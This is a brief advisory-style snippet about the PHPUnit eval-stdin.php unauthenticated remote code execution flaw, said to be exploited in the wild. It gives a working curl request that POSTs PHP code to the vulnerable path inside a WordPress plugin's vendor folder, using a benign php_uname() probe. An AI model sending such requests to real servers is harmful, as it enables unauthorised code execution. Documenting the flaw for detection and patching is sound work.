There was an Unauthenticated Remote Code Execution (RCE) vulnerability in PHPUnit, a widely used testing framework for PHP. This vulnerability has been seen exploited in the wild.
curl -X POST --data "<?php echo php_uname(); ?>" http://example.com//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php